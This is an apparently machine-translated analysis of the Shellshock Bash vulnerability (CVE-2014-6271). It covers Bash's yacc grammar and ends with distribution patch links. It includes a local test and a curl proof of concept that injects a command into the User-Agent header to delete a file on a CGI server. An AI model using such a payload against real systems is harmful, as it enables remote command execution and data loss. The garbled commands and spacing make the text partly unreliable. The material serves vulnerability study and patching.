Shellshock vulnerability analysis from the perspective of Syntax Parsing [CVE-2014-6271]

Shellshock vulnerability analysis from the perspective of Syntax Parsing [CVE-2014-6271]

Document Description

This time, we will take a look at Bash syntax rules through poc analysis, and help you better understand bash and shellshock vulnerabilities from another perspective.

Vulnerability description
Http://cve.mitre.org/cgi-bin/cvename.cgi? Name = CVE-2014-6271
The CVE-2014-6271 vulnerability is a SHELL vulnerability found in Stéphane Chazelas (France) that is triggered by adding redundant strings to the function definitions in the environment variable value, attackers can exploit this vulnerability to change or bypass environmental restrictions to execute shell commands.
This vulnerability may affect OpenSSH sshd that uses the ForceCommand function, Apache servers that use mod_cgi or mod_cgid, DHCP clients, and other applications that use bash as the interpreter.

Vulnerability Testing
1. Local Testing
# Env x = '() {:;}; echo vulnerable' bash-c "echo this is a test"
Print:
Vulnerable
This is a test

Ii. http pass cgi Test
Construct poc. cgi

Make sure that a test. file exists in the local www directory.
# Curl http: // 127.0.0.1/poc. cgi-A 'X = () {:;};/bin/rm/www/test. file'
The test. file has been deleted.

# Curl http: // 192.168.0.1/test. file
<! Doctype html public "-// IETF // dtd html 2.0 // EN">
<Html> <Title> 404 Not Found </title>
</Head> <body>
...
</Body>
</Html>

Vulnerability Analysis
In the preceding test, enter "x = () {:;};/bin/rm/www/test. file is parsed into a function definition and a command through bash syntax analysis. The command is executed in the parse_and_execute function, causing the test. file to be deleted illegally.
The following analysis mainly shows how the bash syntax sets "HTTP_USER_AGENT () {:;}; \ n/bin/rm/www/test. the file character input is parsed into a function definition and a command process. Understanding the Syntax Parsing process of bash helps us better understand the details of this vulnerability.

I. Bash lexical and syntax analysis is implemented using flex and yacc. If you do not understand flex and yacc, You can query relevant information by yourself. Here is a brief introduction:
The Flex lexical analyzer extracts all types of words from the data stream to form tokens for the syntax analyzer to use the Yacc syntax analyzer to move grammar symbols into the Protocol according to certain rules, the final reduction is the target S Grammar

2. Bash lexical tokens can be found in y. tab. c, and are defined in arrays such as word_token_alist and other_token_alist. Bash syntax definition is defined in the parse. y file.
Analyze input data: "HTTP_USER_AGENT () \ n {\ n :;\ n};/bin/rm/www/test. file"

When the function definition is in the function_def state, the function definition is created, as shown in the following interface:
{$ = Make_function_def ($1, $5, function_dstart, function_bstart );}
The corresponding $1 = HTTP_USER_AGENT, $5 is the function body, function_dstart is the function definition start line,
Function_bstart defines the start line for the function body.
/Bin/rm/www/test. file is in simple_command: Status, create a command, call the interface:
COMMAND * make_simple_command (element, command)

3. parsing part of parse_and_execute function is completed by yyparse, which is called in parse_command.

After the parsing is complete, the compliance of the command is not checked. When the Shell executes the command, it calls read_loop to read read_command cyclically and finally calls command_execute to execute the corresponding command.

 

Vulnerability repair:
The following is the official website of the relevant linux release version. Ask the system administrator and webmaster to follow these patch links and download the latest patch in time to fix the Bash vulnerability!

Http://lists.centos.org/pipermail/centos-announce/2014-September/
Https://www.debian.org/security/2014/dsa-3035
Https://rhn.redhat.com/errata/RHSA-2014-1306.html
Http://www.ubuntu.com/usn/usn-2363-1/
Http://support.novell.com/security/cve/CVE-2014-7169.html